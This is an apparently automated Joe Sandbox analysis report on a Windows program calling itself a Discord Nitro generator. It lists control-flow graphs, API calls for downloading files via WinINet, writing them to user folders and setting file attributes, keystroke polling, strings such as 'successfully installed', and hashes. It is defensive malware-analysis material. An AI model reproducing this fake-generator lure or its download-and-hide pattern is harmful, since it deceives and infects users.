std::_Facet_Register 3 API calls 2644->2656 2645->2638 2645->2639 2645->2642 2645->2644 2646 7ff6ace832e4 memcpy 2646->2636 2660 7ff6ace85060 5 API calls 2647->2660 2663 7ff6ace833be 2648->2663 2670 7ff6ace833b9 2648->2670 2675 7ff6ace833b2 _invalid_parameter_noinfo_noreturn 2648->2675 2664 7ff6ace82f7d 2649->2664 2665 7ff6ace82fb3 _invalid_parameter_noinfo_noreturn 2649->2665 2650 7ff6ace85af8 std::_Facet_Register 3 API calls 2659 7ff6ace832df 2650->2659 2654->2646 2654->2650 2655 7ff6ace8332f 2654->2655 2661 7ff6ace83536 2654->2661 2662 7ff6ace85af8 std::_Facet_Register 3 API calls 2655->2662 2656->2664 2657->2661 2667 7ff6ace85af0 free 2658->2667 2659->2646 2668 7ff6ace83328 _invalid_parameter_noinfo_noreturn 2659->2668 2669 7ff6ace830a7 2660->2669 2672 7ff6ace81110 Concurrency::cancel_current_task __std_exception_copy 2661->2672 2662->2646 2671 7ff6ace85060 5 API calls 2663->2671 2664->2638 2665->2644 2666->2658 2667->2647 2668->2655 2674 7ff6ace820d0 42 API calls 2669->2674 2676 7ff6ace85af0 free 2670->2676 2677 7ff6ace83418 2671->2677 2672->2673 2703 7ff6ace811b0 ?_Xlength_error@std@@YAXPEBD 2673->2703 2678 7ff6ace830ba 2674->2678 2675->2670 2676->2663 2679 7ff6ace820d0 42 API calls 2677->2679 2680 7ff6ace830f3 2678->2680 2681 7ff6ace830be SetFileAttributesW 2678->2681 2682 7ff6ace8342f 2679->2682 2684 7ff6ace8313d 2680->2684 2689 7ff6ace83138 2680->2689 2692 7ff6ace83131 _invalid_parameter_noinfo_noreturn 2680->2692 2683 7ff6ace84c30 9 API calls 2681->2683 2685 7ff6ace83468 2682->2685 2686 7ff6ace83433 SetFileAttributesW 2682->2686 2683->2680 2690 7ff6ace8319b 2684->2690 2694 7ff6ace83196 2684->2694 2698 7ff6ace8318f _invalid_parameter_noinfo_noreturn 2684->2698 2688 7ff6ace834b2 2685->2688 2691 7ff6ace834ad 2685->2691 2695 7ff6ace834a6 _invalid_parameter_noinfo_noreturn 2685->2695 2687 7ff6ace84c30 9 API calls 2686->2687 2687->2685 2688->2622 2697 7ff6ace8350b 2688->2697 2700 7ff6ace83504 _invalid_parameter_noinfo_noreturn 2688->2700 2693 7ff6ace85af0 free 2689->2693 2690->2620 2696 7ff6ace85af0 free 2691->2696 2692->2689 2693->2684 2699 7ff6ace85af0 free 2694->2699 2695->2691 2696->2688 2701 7ff6ace85af0 free 2697->2701 2698->2694 2699->2690 2700->2697 2701->2622 2707 7ff6ace85e4a 2708 7ff6ace86528 GetModuleHandleW 2707->2708 2709 7ff6ace85e51 2708->2709 2710 7ff6ace85e55 2709->2710 2711 7ff6ace85e90 _exit 2709->2711 2715 7ff6ace837d0 2716 7ff6ace83803 2715->2716 2717 7ff6ace84640 10 API calls 2716->2717 2723 7ff6ace83861 2716->2723 2720 7ff6ace83826 2717->2720 2718 7ff6ace85ad0 8 API calls 2719 7ff6ace838cb 2718->2719 2721 7ff6ace83834 _fseeki64 2720->2721 2722 7ff6ace8384b fgetpos 2720->2722 2720->2723 2721->2722 2721->2723 2722->2723 2723->2718 2724 7ff6ace83e50 2725 7ff6ace83e6b 2724->2725 2726 7ff6ace83e81 2725->2726 2727 7ff6ace83ebb ungetc 2725->2727 2727->2726 2728 7ff6ace85c38 2729 7ff6ace85c48 2728->2729 2741 7ff6ace85f24 2729->2741 2731 7ff6ace863d8 9 API calls 2732 7ff6ace85ced 2731->2732 2733 7ff6ace85c6c _RTC_Initialize 2739 7ff6ace85ccf 2733->2739 2749 7ff6ace86374 InitializeSListHead 2733->2749 2739->2731 2740 7ff6ace85cdd 2739->2740 2742 7ff6ace85f67 2741->2742 2743 7ff6ace85f35 2741->2743 2742->2733 2744 7ff6ace85fa4 2743->2744 2747 7ff6ace85f3a __scrt_acquire_startup_lock 2743->2747 2745 7ff6ace863d8 9 API calls 2744->2745 2746 7ff6ace85fae 2745->2746 2747->2742 2748 7ff6ace85f57 _initialize_onexit_table 2747->2748 2748->2742 2750 7ff6ace86cb7 2751 7ff6ace84290 2 API calls 2750->2751 2752 7ff6ace86cd6 2751->2752 2753 7ff6ace845c0 2754 7ff6ace82230 15 API calls 2753->2754 2755 7ff6ace845db 2754->2755 2756 7ff6ace845ed 2755->2756 2757 7ff6ace85af0 free 2755->2757 2757->2756 2758 7ff6ace810c0 __std_exception_destroy 2759 7ff6ace84140 2760 7ff6ace8415d 2759->2760 2761 7ff6ace8419a ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAA 2760->2761 2762 7ff6ace84730 12 API calls 2760->2762 2762->2761 2763 7ff6ace83f40 2765 7ff6ace83f66 2763->2765 2767 7ff6ace83f6d 2763->2767 2764 7ff6ace85ad0 8 API calls 2766 7ff6ace840e6 2764->2766 2765->2764 2767->2765 2768 7ff6ace84015 ?out@?$codecvt@DDU_Mbstatet@@@std@@QEBAHAEAU_Mbstatet@@PEBD1AEAPEBDPEAD3AEAPEAD 2767->2768 2769 7ff6ace83ff3 fputc 2767->2769 2770 7ff6ace8405a 2768->2770 2771 7ff6ace84084 2768->2771 2769->2765 2770->2771 2772 7ff6ace8405f 2770->2772 2771->2765 2773 7ff6ace84093 fwrite 2771->2773 2772->2765 2774 7ff6ace84064 fputc 2772->2774 2773->2765 2774->2765 2388 7ff6ace8273f 2389 7ff6ace82748 InternetOpenA 2388->2389 2390 7ff6ace8276c 2389->2390 2391 7ff6ace82775 InternetOpenUrlA 2390->2391 2394 7ff6ace827f8 2390->2394 2392 7ff6ace827b0 HttpQueryInfoA 2391->2392 2393 7ff6ace827ef InternetCloseHandle 2391->2393 2392->2394 2395 7ff6ace827e6 InternetCloseHandle 2392->2395 2393->2394 2396 7ff6ace828c1 2394->2396 2397 7ff6ace828bc 2394->2397 2400 7ff6ace82844 _invalid_parameter_noinfo_noreturn 2394->2400 2402 7ff6ace82856 InternetReadFile InternetCloseHandle InternetCloseHandle 2394->2402 2395->2393 2398 7ff6ace82926 2396->2398 2401 7ff6ace84c30 9 API calls 2396->2401 2399 7ff6ace85af0 free 2397->2399 2399->2396 2400->2394 2403 7ff6ace828f1 2401->2403 2402->2394 2404 7ff6ace85ad0 8 API calls 2403->2404 2405 7ff6ace82905 2404->2405

                                  Executed Functions

                                  Function 00007FF6ACE81520 Relevance: 110.9, APIs: 45, Strings: 18, Instructions: 678sleepkeyboardprocessCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 0 7ff6ace81520-7ff6ace817e7 system SetConsoleTitleW GetStdHandle call 7ff6ace85af8 * 6 call 7ff6ace858a0 call 7ff6ace85b34 GetStdHandle GetConsoleScreenBufferInfo 17 7ff6ace817e9-7ff6ace817f3 0->17 18 7ff6ace817f5-7ff6ace81800 0->18 17->18 19 7ff6ace81806-7ff6ace81809 18->19 20 7ff6ace818c4-7ff6ace81a04 call 7ff6ace84c30 call 7ff6ace85af8 * 2 call 7ff6ace858a0 call 7ff6ace85b34 GetStdHandle GetConsoleScreenBufferInfo 18->20 21 7ff6ace81810-7ff6ace8181c 19->21 49 7ff6ace81a0a-7ff6ace81a0d 20->49 50 7ff6ace81b16-7ff6ace81b84 SetConsoleTextAttribute call 7ff6ace84c30 SetConsoleTextAttribute ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAH@Z SetConsoleTextAttribute ?fail@ios_base@std@@QEBA_NXZ 20->50 23 7ff6ace8188a-7ff6ace81892 21->23 24 7ff6ace8181e-7ff6ace8183b call 7ff6ace842f0 21->24 26 7ff6ace81897-7ff6ace818be call 7ff6ace856e0 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z 23->26 27 7ff6ace81894 23->27 34 7ff6ace8183d 24->34 35 7ff6ace81840-7ff6ace81846 call 7ff6ace856e0 24->35 26->20 26->21 27->26 34->35 39 7ff6ace8184b-7ff6ace81857 35->39 39->23 41 7ff6ace81859-7ff6ace8186a 39->41 43 7ff6ace8186c-7ff6ace8187f 41->43 44 7ff6ace81885 call 7ff6ace85af0 41->44 43->44 46 7ff6ace81a9a-7ff6ace81aa0 _invalid_parameter_noinfo_noreturn 43->46 44->23 51 7ff6ace81aa1 46->51 53 7ff6ace81a10-7ff6ace81a39 call 7ff6ace842f0 49->53 61 7ff6ace81b8a-7ff6ace81b8f 50->61 62 7ff6ace81fb3-7ff6ace81fdb call 7ff6ace84c30 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z Sleep 50->62 52 7ff6ace81aa4-7ff6ace81ab1 51->52 55 7ff6ace81af5-7ff6ace81b10 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z 52->55 56 7ff6ace81ab3-7ff6ace81ab7 52->56 66 7ff6ace81a3b 53->66 67 7ff6ace81a3e-7ff6ace81a44 call 7ff6ace856e0 53->67 55->50 55->53 59 7ff6ace81ac0-7ff6ace81ad0 56->59 63 7ff6ace81ad7-7ff6ace81ae8 SetConsoleTextAttribute call 7ff6ace84a60 59->63 64 7ff6ace81ad2 59->64 68 7ff6ace81faa-7ff6ace81fb2 exit 61->68 69 7ff6ace81b95-7ff6ace81b98 61->69 74 7ff6ace81fe1-7ff6ace81fee call 7ff6ace81520 62->74 75 7ff6ace81aed-7ff6ace81af3 63->75 64->63 66->67 76 7ff6ace81a49-7ff6ace81a55 67->76 68->62 69->62 73 7ff6ace81b9e-7ff6ace81d38 call 7ff6ace84c30 SetConsoleTextAttribute call 7ff6ace84c30 SetConsoleTextAttribute call 7ff6ace84c30 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z Sleep SetConsoleTextAttribute call 7ff6ace84c30 SetConsoleTextAttribute call 7ff6ace84c30 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z SetConsoleTextAttribute call 7ff6ace84c30 SetConsoleTextAttribute call 7ff6ace84c30 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z call 7ff6ace84c30 Sleep _time64 srand call 7ff6ace81370 SetConsoleTextAttribute call 7ff6ace84c30 SetConsoleTextAttribute 69->73 168 7ff6ace820c3-7ff6ace820c8 call 7ff6ace811b0 73->168 169 7ff6ace81d3e-7ff6ace81d41 73->169 88 7ff6ace82045-7ff6ace8204c 74->88 89 7ff6ace81ff0-7ff6ace82012 call 7ff6ace852c0 74->89 75->55 75->59 79 7ff6ace81a88-7ff6ace81a90 76->79 80 7ff6ace81a57-7ff6ace81a68 76->80 79->51 86 7ff6ace81a92-7ff6ace81a98 79->86 84 7ff6ace81a6a-7ff6ace81a7d 80->84 85 7ff6ace81a83 call 7ff6ace85af0 80->85 84->85 90 7ff6ace81da1-7ff6ace81da7 _invalid_parameter_noinfo_noreturn 84->90 85->79 86->52 92 7ff6ace82093-7ff6ace820c2 call 7ff6ace85ad0 88->92 93 7ff6ace8204e-7ff6ace82070 call 7ff6ace852c0 88->93 107 7ff6ace82014-7ff6ace82027 89->107 108 7ff6ace82030-7ff6ace8203d call 7ff6ace85af0 89->108 96 7ff6ace81da8-7ff6ace81db7 90->96 112 7ff6ace82072-7ff6ace82085 93->112 113 7ff6ace8208e call 7ff6ace85af0 93->113 101 7ff6ace81db9-7ff6ace81dc0 96->101 102 7ff6ace81df3 96->102 109 7ff6ace81dc2-7ff6ace81dc9 101->109 110 7ff6ace81dee call 7ff6ace85af8 101->110 104 7ff6ace81df6 102->104 114 7ff6ace81dfa-7ff6ace81e5c memcpy call 7ff6ace856e0 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z 104->114 107->108 116 7ff6ace82029-7ff6ace8202f _invalid_parameter_noinfo_noreturn 107->116 108->88 117 7ff6ace820c9-7ff6ace820cf call 7ff6ace81110 109->117 118 7ff6ace81dcf-7ff6ace81dda call 7ff6ace85af8 109->118 110->102 112->113 120 7ff6ace82087-7ff6ace8208d _invalid_parameter_noinfo_noreturn 112->120 113->92 131 7ff6ace81e8f-7ff6ace81e9f GetAsyncKeyState 114->131 132 7ff6ace81e5e-7ff6ace81e6f 114->132 116->108 134 7ff6ace81f60-7ff6ace81f66 _invalid_parameter_noinfo_noreturn 118->134 135 7ff6ace81de0-7ff6ace81dec 118->135 120->113 139 7ff6ace81f67-7ff6ace81f72 131->139 140 7ff6ace81ea5-7ff6ace81ec4 call 7ff6ace84e10 131->140 136 7ff6ace81e8a call 7ff6ace85af0 132->136 137 7ff6ace81e71-7ff6ace81e84 132->137 134->139 135->104 136->131 137->134 137->136 139->74 143 7ff6ace81f74-7ff6ace81f85 139->143 152 7ff6ace81ef7-7ff6ace81f52 call 7ff6ace81370 SetConsoleTextAttribute call 7ff6ace84c30 SetConsoleTextAttribute 140->152 153 7ff6ace81ec6-7ff6ace81ed7 140->153 146 7ff6ace81f87-7ff6ace81f9a 143->146 147 7ff6ace81fa3-7ff6ace81fa8 call 7ff6ace85af0 143->147 146->147 150 7ff6ace81f9c-7ff6ace81fa2 _invalid_parameter_noinfo_noreturn 146->150 147->74 150->147 167 7ff6ace81f58-7ff6ace81f5b 152->167 152->168 155 7ff6ace81ed9-7ff6ace81eec 153->155 156 7ff6ace81ef2 call 7ff6ace85af0 153->156 155->150 155->156 156->152 170 7ff6ace81d44-7ff6ace81d60 167->170 168->117 169->170 172 7ff6ace81d69-7ff6ace81d8a 170->172 173 7ff6ace81d62-7ff6ace81d66 170->173 172->114 175 7ff6ace81d8c-7ff6ace81d96 172->175 173->172 175->96 176 7ff6ace81d98-7ff6ace81d9f 175->176 176->118
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2910658754.00007FF6ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ACE80000, based on PE: true
                                  • Associated: 00000000.00000002.2910610255.00007FF6ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2910707610.00007FF6ACE87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2910756557.00007FF6ACE8B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2910788949.00007FF6ACE8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff6ace80000_80BvHOM51j.jbxd
                                  Similarity
                                  • API ID: Console$V01@$AttributeText$D@std@@@std@@U?$char_traits@$??6?$basic_ostream@V01@@_invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task$HandleSleep$BufferInfoScreenmemcpy$??5?$basic_istream@?fail@ios_base@std@@AsyncStateTitleXlength_error@std@@__std_exception_copy_time64exitmallocmemsetsrandsystem
                                  • String ID: $ < $ < Now starting generation..$ < Setting up proxies..$ < To stop generating, press X$ _ __ $0. Exit$Completed$Invalid$Invalid input$Note$Setting up$Your choice: $[STELLAR] Discord Nitro Generator$cls$| '__|$| | $|_|
                                  • API String ID: 1542856839-1493501309
                                  • Opcode ID: c95d794933045815afd8993f0b58f1254e93c447ee2377c7af2ed15d2179f56e
                                  • Instruction ID: b526e793a786ce7d64fed80961a37c3c276692ba6122e7e69da8dbfd8dd9e243
                                  • Opcode Fuzzy Hash: c95d794933045815afd8993f0b58f1254e93c447ee2377c7af2ed15d2179f56e
                                  • Instruction Fuzzy Hash: D7627E72E1AB8685EB00CF65D880AB93361FF85B94F505231E96DA7BA5DF3CE581C340
                                  Function 00007FF6ACE82C60 Relevance: 56.5, APIs: 29, Strings: 3, Instructions: 489networkCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 177 7ff6ace82c60-7ff6ace82ccd InternetOpenA 179 7ff6ace82dc9 177->179 180 7ff6ace82cd3-7ff6ace82d0c InternetOpenUrlA 177->180 181 7ff6ace82dcb-7ff6ace82dd6 179->181 182 7ff6ace82d1c-7ff6ace82d50 HttpQueryInfoA 180->182 183 7ff6ace82d0e-7ff6ace82d17 InternetCloseHandle 180->183 184 7ff6ace82dd8-7ff6ace82dec 181->184 185 7ff6ace82e0f-7ff6ace82e2a 181->185 186 7ff6ace82d66-7ff6ace82daf call 7ff6ace85c04 InternetReadFile InternetCloseHandle * 2 182->186 187 7ff6ace82d52-7ff6ace82d64 InternetCloseHandle * 2 182->187 183->179 188 7ff6ace82e0a call 7ff6ace85af0 184->188 189 7ff6ace82dee-7ff6ace82e01 184->189 190 7ff6ace82e2c-7ff6ace82e33 185->190 191 7ff6ace82e38-7ff6ace82e83 SHGetFolderPathA 185->191 198 7ff6ace82dc6 186->198 199 7ff6ace82db1-7ff6ace82dbd 186->199 187->179 188->185 189->188 193 7ff6ace82e03-7ff6ace82e09 _invalid_parameter_noinfo_noreturn 189->193 190->191 195 7ff6ace82e89-7ff6ace82f0d 191->195 196 7ff6ace831be-7ff6ace831df SHGetFolderPathA 191->196 193->188 201 7ff6ace82f10-7ff6ace82f17 195->201 202 7ff6ace831e5-7ff6ace83269 196->202 203 7ff6ace83510-7ff6ace8351d call 7ff6ace85af0 call 7ff6ace81520 196->203 198->179 199->198 204 7ff6ace82dbf-7ff6ace82dc4 199->204 201->201 205 7ff6ace82f19-7ff6ace82f1c 201->205 206 7ff6ace83270-7ff6ace83277 202->206 212 7ff6ace8352b-7ff6ace83530 call 7ff6ace811b0 203->212 204->181 209 7ff6ace8353d-7ff6ace83573 call 7ff6ace811b0 call 7ff6ace851b0 ?always_noconv@codecvt_base@std@@QEBA_NXZ 205->209 210 7ff6ace82f22-7ff6ace82f26 205->210 206->206 211 7ff6ace83279-7ff6ace8327c 206->211 250 7ff6ace83588-7ff6ace83599 ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ 209->250 251 7ff6ace83575-7ff6ace83587 209->251 216 7ff6ace82f5d-7ff6ace82f67 210->216 217 7ff6ace82f28-7ff6ace82f58 memcpy 210->217 211->212 213 7ff6ace83282-7ff6ace83286 211->213 244 7ff6ace83531-7ff6ace83536 call 7ff6ace81110 212->244 219 7ff6ace832bd-7ff6ace832c7 213->219 220 7ff6ace83288-7ff6ace832b8 memcpy 213->220 221 7ff6ace82f8b-7ff6ace82f99 216->221 222 7ff6ace82f69-7ff6ace82f6c 216->222 218 7ff6ace82ff1-7ff6ace83014 call 7ff6ace84f80 217->218 245 7ff6ace8304d-7ff6ace830bc call 7ff6ace85060 call 7ff6ace820d0 218->245 246 7ff6ace83016-7ff6ace8302a 218->246 229 7ff6ace832c9-7ff6ace832d3 219->229 230 7ff6ace832f2-7ff6ace83309 219->230 227 7ff6ace83362-7ff6ace83385 call 7ff6ace84f80 220->227 232 7ff6ace82f9b-7ff6ace82fa2 221->232 233 7ff6ace82fc2-7ff6ace82fee memcpy 221->233 228 7ff6ace82f70-7ff6ace82f7b call 7ff6ace85af8 222->228 265 7ff6ace83387-7ff6ace8339b 227->265 266 7ff6ace833be-7ff6ace83431 call 7ff6ace85060 call 7ff6ace820d0 227->266 267 7ff6ace82f7d-7ff6ace82f89 228->267 268 7ff6ace82fb3-7ff6ace82fb9 _invalid_parameter_noinfo_noreturn 228->268 238 7ff6ace832d7-7ff6ace832e2 call 7ff6ace85af8 229->238 242 7ff6ace8330b-7ff6ace8330e 230->242 243 7ff6ace83310-7ff6ace83317 230->243 240 7ff6ace82fba-7ff6ace82fbf call 7ff6ace85af8 232->240 241 7ff6ace82fa4-7ff6ace82fab 232->241 233->218 273 7ff6ace83328-7ff6ace8332e _invalid_parameter_noinfo_noreturn 238->273 274 7ff6ace832e4-7ff6ace832f0 238->274 240->233 241->244 252 7ff6ace82fb1 241->252 253 7ff6ace83337-7ff6ace8335e memcpy 242->253 254 7ff6ace83319-7ff6ace83320 243->254 255 7ff6ace8332f-7ff6ace83334 call 7ff6ace85af8 243->255 262 7ff6ace83537-7ff6ace8353c call 7ff6ace81110 244->262 288 7ff6ace830f4-7ff6ace830ff 245->288 289 7ff6ace830be-7ff6ace830f3 SetFileAttributesW call 7ff6ace84c30 245->289 258 7ff6ace8302c-7ff6ace8303f 246->258 259 7ff6ace83048 call 7ff6ace85af0 246->259 252->228 253->227 254->262 263 7ff6ace83326 254->263 255->253 258->259 271 7ff6ace83041-7ff6ace83047 _invalid_parameter_noinfo_noreturn 258->271 259->245 262->209 263->238 277 7ff6ace8339d-7ff6ace833b0 265->277 278 7ff6ace833b9 call 7ff6ace85af0 265->278 294 7ff6ace83469-7ff6ace83474 266->294 295 7ff6ace83433-7ff6ace83468 SetFileAttributesW call 7ff6ace84c30 266->295 267->233 268->240 271->259 273->255 274->253 277->278 283 7ff6ace833b2-7ff6ace833b8 _invalid_parameter_noinfo_noreturn 277->283 278->266 283->278 292 7ff6ace8313d-7ff6ace83162 288->292 293 7ff6ace83101-7ff6ace8311a 288->293 289->288 302 7ff6ace8319b-7ff6ace831b4 292->302 303 7ff6ace83164-7ff6ace83178 292->303 300 7ff6ace8311c-7ff6ace8312f 293->300 301 7ff6ace83138 call 7ff6ace85af0 293->301 297 7ff6ace83476-7ff6ace8348f 294->297 298 7ff6ace834b2-7ff6ace834d7 294->298 295->294 305 7ff6ace834ad call 7ff6ace85af0 297->305 306 7ff6ace83491-7ff6ace834a4 297->306 298->203 307 7ff6ace834d9-7ff6ace834ed 298->307 300->301 308 7ff6ace83131-7ff6ace83137 _invalid_parameter_noinfo_noreturn 300->308 301->292 302->196 310 7ff6ace8317a-7ff6ace8318d 303->310 311 7ff6ace83196 call 7ff6ace85af0 303->311 305->298 306->305 312 7ff6ace834a6-7ff6ace834ac _invalid_parameter_noinfo_noreturn 306->312 314 7ff6ace8350b call 7ff6ace85af0 307->314 315 7ff6ace834ef-7ff6ace83502 307->315 308->301 310->311 316 7ff6ace8318f-7ff6ace83195 _invalid_parameter_noinfo_noreturn 310->316 311->302 312->305 314->203 315->314 318 7ff6ace83504-7ff6ace8350a _invalid_parameter_noinfo_noreturn 315->318 316->311 318->314
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2910658754.00007FF6ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ACE80000, based on PE: true
                                  • Associated: 00000000.00000002.2910610255.00007FF6ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2910707610.00007FF6ACE87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2910756557.00007FF6ACE8B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2910788949.00007FF6ACE8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff6ace80000_80BvHOM51j.jbxd
                                  Similarity
                                  • API ID: Internet$Open$CloseHandle_invalid_parameter_noinfo_noreturn
                                  • String ID: Mozilla/5.0$[+] successfully installed$[-] proxy 2 fail
                                  • API String ID: 2221183930-1568038784
                                  • Opcode ID: ea5bf015b3e2db58eccb78138e66b885dc162a5a1f37a9809a3828ab11b30293
                                  • Instruction ID: 73a84930cc9334af29f06af58631331f2fe9d7eaf4b7ba9a188f998cd1a67b22
                                  • Opcode Fuzzy Hash: ea5bf015b3e2db58eccb78138e66b885dc162a5a1f37a9809a3828ab11b30293
                                  • Instruction Fuzzy Hash: 0B327172A06BC689EB709F25D8847EC33A1FB44798F404635DA6DABBD9DF78D2449300
                                  Function 00007FF6ACE826F6 Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 215networkfileCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2910658754.00007FF6ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ACE80000, based on PE: true
                                  • Associated: 00000000.00000002.2910610255.00007FF6ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2910707610.00007FF6ACE87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2910756557.00007FF6ACE8B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2910788949.00007FF6ACE8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff6ace80000_80BvHOM51j.jbxd
                                  Similarity
                                  • API ID: Internet$CloseHandle$Open$FileHttpInfoQueryRead_invalid_parameter_noinfo_noreturn
                                  • String ID: Mozilla/5.0$[-] proxy 1 fail
                                  • API String ID: 2088088030-150384382
                                  • Opcode ID: 1079f67829109179acccc4f1b730acce526c81ed9b9485b3d77467892d480998
                                  • Instruction ID: 36b51bd741a1571965cb91ddf3c7f715ecbb29670a26ab9eab26a43488e885f6
                                  • Opcode Fuzzy Hash: 1079f67829109179acccc4f1b730acce526c81ed9b9485b3d77467892d480998
                                  • Instruction Fuzzy Hash: 5CC19776606BC58DDBB0CF25DC807DD33A4F708B98F508526DA4EABB58EF3596998300
                                  Function 00007FF6ACE8273F Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 79networkfileCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2910658754.00007FF6ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ACE80000, based on PE: true
                                  • Associated: 00000000.00000002.2910610255.00007FF6ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2910707610.00007FF6ACE87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2910756557.00007FF6ACE8B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2910788949.00007FF6ACE8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff6ace80000_80BvHOM51j.jbxd
                                  Similarity
                                  • API ID: Internet$CloseHandle$Open$FileHttpInfoQueryRead_invalid_parameter_noinfo_noreturn
                                  • String ID: Mozilla/5.0
                                  • API String ID: 2088088030-2630049532
                                  • Opcode ID: 02377c09271c27bb6df21d7c9358ae724bd4cbfbaec6d59966b322c224eb7d10
                                  • Instruction ID: e93606236fc09e55eda660554dace081693061de51319a4be61acc2bcbca967c
                                  • Opcode Fuzzy Hash: 02377c09271c27bb6df21d7c9358ae724bd4cbfbaec6d59966b322c224eb7d10
                                  • Instruction Fuzzy Hash: E5317976B0A7C28AEB708F219854BA837A1FB45B98F400135E91EAAB98DF3CD544C300
                                  Function 00007FF6ACE82702 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 78networkfileCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2910658754.00007FF6ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ACE80000, based on PE: true
                                  • Associated: 00000000.00000002.2910610255.00007FF6ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2910707610.00007FF6ACE87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2910756557.00007FF6ACE8B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2910788949.00007FF6ACE8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff6ace80000_80BvHOM51j.jbxd
                                  Similarity
                                  • API ID: Internet$CloseHandle$Open$FileHttpInfoQueryRead_invalid_parameter_noinfo_noreturn
                                  • String ID: Mozilla/5.0
                                  • API String ID: 2088088030-2630049532
                                  • Opcode ID: 0f3e6a03877e5589d8b78e1227934c4593c6f712853129a7b3cc022927336c20
                                  • Instruction ID: 9049121d9dee575c32cd1d0569fe59ca26517f3d08b571684560ae2c5b850b19
                                  • Opcode Fuzzy Hash: 0f3e6a03877e5589d8b78e1227934c4593c6f712853129a7b3cc022927336c20
                                  • Instruction Fuzzy Hash: 3A314D72B0A7C28AEB709F219844BA83391FB55BD4F404135E91DABB94DF3CD544D300
                                  Function 00007FF6ACE847F0 Relevance: 16.6, APIs: 11, Instructions: 126COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                  • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140(?,?,?,?,?,?,?,?,?,00000000,?,00007FF6ACE82158), ref: 00007FF6ACE8482D
                                  • ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP140 ref: 00007FF6ACE8484C
                                  • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF6ACE8487E
                                  • ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF6ACE84899
                                  • ?_Fiopen@std@@YAPEAU_iobuf@@PEBDHH@Z.MSVCP140 ref: 00007FF6ACE848C3
